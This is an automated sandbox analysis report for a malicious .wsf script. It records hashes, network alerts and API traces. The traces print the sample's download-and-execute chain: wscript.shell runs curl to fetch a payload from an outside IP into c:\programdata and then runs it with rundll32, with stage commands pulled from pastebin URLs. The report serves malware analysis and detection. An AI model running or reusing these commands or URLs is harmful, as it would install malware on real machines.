popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Funds_792120.wsf

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 19, 2023, 9:33 a.m. April 19, 2023, 9:35 a.m.
Size 77.8KB
Type UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
MD5 dbf85f39dd98463b298f50302d64ea40
SHA256 13bde59e20034a2ce1797c7890cdd770fedef78f29f0e47c558c6eb9d91e8f10
CRC32 2758F827
ssdeep 1536:uA8ZOy2JyfnK/32SNnW7s8LnNVcKOAuWQwnn5QJp985ElDCCjIWp:uQNJWnK/mSN58LnNVcg75Q186lDCji
Yara None matched

Name Response Post-Analysis Lookup
pastebin.com
A 172.67.34.170
A 104.20.67.143
A 104.20.68.143
104.20.67.143
IP Address Status Action
164.124.101.2 Active Moloch
172.67.34.170 Active Moloch
216.120.201.169 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49161 -> 172.67.34.170:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49161
172.67.34.170:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 79:b7:9c:ec:8a:be:ea:82:0d:16:04:fb:46:5f:89:6b:78:b9:43:fd

request GET https://pastebin.com/raw/zD5ag0UX
request GET https://pastebin.com/raw/mJfkXNYx
host 216.120.201.169
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: https://pastebin.com/raw/zD5ag0UX
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/zD5ag0UX
1 13369356 0

InternetCrackUrlA

 url: https://pastebin.com/raw/zD5ag0UX
flags: 0
1 1 0

InternetReadFile

 buffer: new ActiveXObject('wscript.shell').run('curl.exe --output c:\\programdata\\index.html --url ' + url, 6);
request_handle: 0x00cc000c
1 1 0

InternetCrackUrlW

 url: https://pastebin.com/raw/mJfkXNYx
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/mJfkXNYx
1 13369356 0

InternetCrackUrlA

 url: https://pastebin.com/raw/mJfkXNYx
flags: 0
1 1 0

InternetReadFile

 buffer: new ActiveXObject('wscript.shell').run('rundll32 c:\\programdata\\index.html,Motd');
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: https://pastebin.com/raw/zD5ag0UX
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/zD5ag0UX
1 13369356 0

send

 buffer: !
socket: 860
sent: 1
1 1 0

send

 buffer: okd?6ÏÄҚo®ÛP õƘxs0o ^æƒA_e¤‚/5 ÀÀÀ À 28*ÿ pastebin.com  
socket: 968
sent: 116
1 116 0

send

 buffer: !
socket: 860
sent: 1
1 1 0

send

 buffer: FBA¤ 3AA *®ïlEpR¦•ØI •1òƬçòùðâQ>~_›—'ÍïXõŠ ç°§üOwɮܛûø¢§û£0{=WZT j 9ï ˜% ÆÒÙÁ18³-aÍ÷GïaԉÏÊ+×Âíê$T(]¯ù
socket: 968
sent: 134
1 134 0

send

 buffer: !
socket: 860
sent: 1
1 1 0

send

 buffer: P%x[ɘ+Úºðº_k陗ÈÙ¿ÊÒ<Î/dâªhs21­Ÿ­Xá#X^®¯xŸ˜î[!¬¾Û°j-Y·¦§„xG3 Àö|_ äU_3³AöÞ*ÂßM¬÷E·ÑbrÞ¼O‹ŒÚlÂéB®ýÓÆèõln4|œ€0ßþŒ|I·Z×e-}9w¶œà÷‘¶×ˆ–6󕝮wð‚É‘—… öàí5£ó×$I Ãý'"AfR/÷óp›štcæ5®!9Ã?aïVgS(ÿÁâg›‚B†ªßk„ØROi{â—_ÚB«ixÙZHíø÷+¿Ì¤ÑabJ…ß囖(üZœÙ´„…´é÷‰˜´<S/ó@Út™ >&þReQêùš'°º¯x|¥øUtZ⊬Ӣ^“ĸÕêÙN;:è+òNrDœŽn«
socket: 968
sent: 341
1 341 0

send

 buffer: !
socket: 860
sent: 1
1 1 0

InternetCrackUrlA

 url: https://pastebin.com/raw/zD5ag0UX
flags: 0
1 1 0

InternetCrackUrlW

 url: https://pastebin.com/raw/mJfkXNYx
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/mJfkXNYx
1 13369356 0

send

 buffer: Pp‹#<+è®2LZt?,-Ü&Â<7î—ý%òßlÁÏ÷š Wȉ"[3nY­Åð.R×F‚dª+QùŠ÷$øx^”gœX[õÔC´~­G}5ç)ƒniŸç ɱ)Wâ„˜è çSb”ŽJGÕBbNÐÁ rãX—’gÉjvâàâfÕÇøÒ¼-‹è;Ë÷rþä.$¦ñïaà+Ú½?êfù(óG!·@é{%‹‚oÐ`Pz°ì]ó¸Å§‹Â5ñ¶~z@#wÓ*¿Å³è¯çeŸ’Ç`¶J]H¯<h@1.ZÒî67@c‰÷ùˆ#c·¶µÛ¡vg‰‹k]é,•M©´ÛòaË"ìW½ÅöL`Þɒ¾Ü”ÒBØÎo´,lOwhŒædÖÑi!V÷CêSiÎw2ïre¢JŽK¸úé²_ͅГü× ÌÆ
socket: 968
sent: 341
1 341 0

send

 buffer: !
socket: 860
sent: 1
1 1 0

InternetCrackUrlA

 url: https://pastebin.com/raw/mJfkXNYx
flags: 0
1 1 0
parent_process wscript.exe martian_process rundll32 c:\programdata\index.html,Motd
parent_process wscript.exe martian_process curl.exe --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj98wz.dat
parent_process wscript.exe martian_process "C:\util\curl\curl.exe" --output c:\programdata\index.html --url http://216.120.201.169/aSxBaqnfj98wz.dat
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" c:\programdata\index.html,Motd
dead_host 216.120.201.169:80
count 5483 name heapspray process wscript.exe total_mb 235 length 45056 protection PAGE_READWRITE
count 46613 name heapspray process wscript.exe total_mb 546 length 12288 protection PAGE_READWRITE
count 8222 name heapspray process wscript.exe total_mb 289 length 36864 protection PAGE_READWRITE
count 2741 name heapspray process wscript.exe total_mb 160 length 61440 protection PAGE_READWRITE
count 5483 name heapspray process wscript.exe total_mb 342 length 65536 protection PAGE_READWRITE
count 13706 name heapspray process wscript.exe total_mb 374 length 28672 protection PAGE_READWRITE
count 8248 name heapspray process wscript.exe total_mb 64 length 8192 protection PAGE_READWRITE
count 5485 name heapspray process wscript.exe total_mb 278 length 53248 protection PAGE_READWRITE
count 5484 name heapspray process wscript.exe total_mb 407 length 77824 protection PAGE_READWRITE
count 2740 name heapspray process wscript.exe total_mb 267 length 102400 protection PAGE_READWRITE
count 5485 name heapspray process wscript.exe total_mb 428 length 81920 protection PAGE_READWRITE
count 8235 name heapspray process wscript.exe total_mb 160 length 20480 protection PAGE_READWRITE
count 5488 name heapspray process wscript.exe total_mb 128 length 24576 protection PAGE_READWRITE
count 8223 name heapspray process wscript.exe total_mb 546 length 69632 protection PAGE_READWRITE
count 2741 name heapspray process wscript.exe total_mb 128 length 49152 protection PAGE_READWRITE
file C:\util\curl\curl.exe
file C:\Windows\System32\rundll32.exe